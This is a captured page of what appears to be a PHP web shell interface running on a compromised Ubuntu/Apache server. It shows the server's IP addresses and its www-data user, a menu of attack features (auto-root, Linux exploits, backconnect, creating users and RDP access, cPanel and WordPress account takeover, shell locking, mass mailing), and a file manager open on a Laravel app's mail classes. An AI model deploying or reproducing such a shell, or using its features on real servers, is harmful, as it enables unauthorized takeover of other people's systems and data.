Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 18.191.142.102
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cravings-staging /
app /
Mail /
[ HOME SHELL ]
Name
Size
Permission
Action
NewBusiness.php
1
KB
-rw-rw-r--
NewReview.php
1.05
KB
-rw-rw-r--
NewUser.php
877
B
-rw-rw-r--
Plain.php
1.01
KB
-rw-rw-r--
RegisterTester.php
1.02
KB
-rw-rw-r--
RegisterUser.php
868
B
-rw-rw-r--
ResendLink.php
1001
B
-rw-rw-r--
ResetPassword.php
871
B
-rw-rw-r--
UserRegistered.php
887
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : NewReview.php
<?php namespace App\Mail; use Illuminate\Bus\Queueable; use Illuminate\Contracts\Queue\ShouldQueue; use Illuminate\Mail\Mailable; use Illuminate\Queue\SerializesModels; class NewReview extends Mailable { use Queueable, SerializesModels; private $review; /** * Create a new message instance. * * @return void */ public function __construct($review) { $this->review = $review; } /** * Build the message. * * @return $this */ public function build() { return $this->from('hello@cravvings.com', 'Cravvings Alerts') ->subject('New Review') ->view('emails.alerts.new_review') ->with([ "name" => $this->review['nickname'], "place" => $this->review['place_name'], "rate" => $this->review['rate'], "comment" => $this->review['comment'], "food" => $this->review['food_name'] ]); } }
Close